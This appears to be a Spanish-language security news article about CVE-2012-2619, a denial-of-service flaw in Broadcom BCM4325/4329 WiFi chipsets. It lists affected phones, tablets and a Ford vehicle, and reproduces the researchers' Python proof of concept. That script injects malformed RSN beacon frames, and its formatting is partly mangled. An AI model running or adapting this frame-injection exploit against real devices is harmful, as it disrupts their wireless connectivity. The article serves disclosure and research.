Publicada vulnerabilidad presente en determinados Chipset de la firma Broadcom, en especial los modelos BCM4325/29 integrados en multitud de dispositivos inalámbricos como smartphones, tablets e incluso vehículos (como el Ford Edge).

El fallo permitiría realizar una denegación de servicio al módulo inalámbrico e incluso la revelación de información sensible según los propios investigadores. El fallo podría reproducirse atacando directamente al módulo WiFi independientemente del sistema operativo presente en el dispositivo.

La vulnerabilidad (CVE-2012-2619) reportada por el laboratorio de CoreLabs (Core Security Technologies) fue descubierta por el investigador argentino Andrés Blanco, del que hizo pública demostración durante la pasada Ekoparty en Buenos Aires, Argentina. Su compañero Matias Eissler desarrolló la prueba de concepto totalmente funcional.

Mediante estudios de ingeniería inversa consiguieron comprender la estructura del firmware de los dispositivos Broadcom, hallando la forma de alterar el tráfico WiFi (normativa IEEE 802.11) de tal manera que afectara a dichos dispositivos inalámbricos, a través del envío de tramas RSN (IEEE 802.11i, WPA/WPA2) especialmente manipuladas.

El protocolo RSN (Robust Security Network) interviene en la negociación y establecimiento del tipo de autenticación y cifrado utilizado durante una sesión WPA/WPA2.

En coordinación con los investigadores y el US-CERT, Broadcom facilitó a los diferentes fabricantes (Apple, HTC, Motorola, Sony, Nokia,
Samsung…) un nuevo firmware que impide la vulnerabilidad para integrarlo en sus dispositivos, por lo que se da como subsanada.

Los dispositivos afectados con el chipset BCM4325:
Apple iPhone 3GS
Apple iPod 2G
HTC Touch Pro 2
HTC Droid Incredible
Samsung Spica
Acer Liquid
Motorola Devour
Vehículo Ford Edge

Dispositivos afectados con el chipset BCM4329:
Apple iPhone 4
Apple iPhone 4 Verizon
Apple iPod 3G
Apple iPad Wi-Fi
Apple iPad 3G
Apple iPad 2
Apple Tv 2G
Motorola Xoom
Motorola Droid X2
Motorola Atrix
Samsung Galaxy Tab
Samsung Galaxy S 4G
Samsung Nexus S
Samsung Stratosphere
Samsung Fascinate
HTC Nexus One
HTC Evo 4G
HTC ThunderBolt
HTC Droid Incredible 2
LG Revolution
Sony Ericsson Xperia Play
Pantech Breakout
Nokia Lumina 800
Kyocera Echo
Asus Transformer Prime
Malata ZPad

Y la prueba de concepto realizada por Matias Eissler:

– ————————- poc.py ————————- #!/usr/bin/env python

import sys
import time
import struct
import PyLorcon2

def beaconFrameGenerator():
sequence = 0
while(1):
sequence = sequence % 4096

# Frame Control
frame = ‘x80’ # Version: 0 – Type: Managment – Subtype: Beacon frame += ‘x00’ # Flags: 0 frame += ‘x00x00’ # Duration: 0 frame += ‘xffxffxffxffxffxff’ # Destination: ff:ff:ff:ff:ff:ff frame += ‘x00x00x00x15xdexad’ # Source: 00:00:00:15:de:ad frame += ‘x00x00x00x15xdexad’ # BSSID: 00:00:00:15:de:ad frame += struct.pack(‘H’, sequence) # Fragment: 0 – Sequenence:
part of the generator
# Frame Body
frame += struct.pack(‘Q’, time.time()) # Timestamp frame += ‘x64x00’ # Beacon Interval: 0.102400 seconds frame += ‘x11x04’ # Capability Information: ESS, Privacy, Short Slot time # Information Elements # SSID: buggy frame += ‘x00x05buggy’
# Supported Rates: 1,2,5.5,11,18,24,36,54 frame += ‘x01x08x82x84x8bx96x24x30x48x6c’
# DS Parameter Set: 6
frame += ‘x03x01x06’
# RSN IE
frame += ‘x30’ # ID: 48
frame += ‘x14’ # Size: 20
frame += ‘x01x00’ # Version: 1
frame += ‘x00x0fxacx04’ # Group cipher suite: TKIP frame += ‘x01x00’ # Pairwise cipher suite count: 1 frame += ‘x00x0fxacx00’ # Pairwise cipher suite 1: TKIP frame += ‘xffxff’ # Authentication suites count: 65535 frame += ‘x00x0fxacx02’ # Pairwise authentication suite 2: PSK frame += ‘x00x00’

sequence += 1
yield frame

if __name__ == "__main__":
if len(sys.argv) != 2:
print "Usage:"
print "t%s <wireless interface>" % sys.argv[0]
sys.exit(-1)

iface = sys.argv[1]
context = PyLorcon2.Context(iface)
context.open_injmon()

generator = beaconFrameGenerator()

for i in range(10000):
frame = generator.next()
time.sleep(0.100)
context.send_bytes(frame)

Opina sobre esta noticia:
http://unaaldia.hispasec.com/2012/10/denegacion-de-servicio-multitud-de.html#comments

Más información:

VU#160027: Broadcom BCM4325 and BCM4329 wireless chipset denial-of-service vulnerability
http://www.kb.cert.org/vuls/id/160027

Broadcom DoS on BCM4325 and BCM4329 devices
http://www.coresecurity.com/content/broadcom-input-validation-BCM4325-BCM4329

One firmware to monitor ‘em all
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=One_firmware_to_monitor_em_all

Fuente:
José Mesa Orihuela
jmesa@hispasec.com
Laboratorio Hispasec
www.hispasec.com

Imagen:
Fotos Digitales Gratis
www.fotosdigitalesgratis.com

Logos/Imágenes MR Respectivas Compañías mencionadas en la noticia.
Portal de Seguridad Informática, Tecnología e Internet
Descargas Antivirus/Antimalware
www.antivirusgratis.com.ar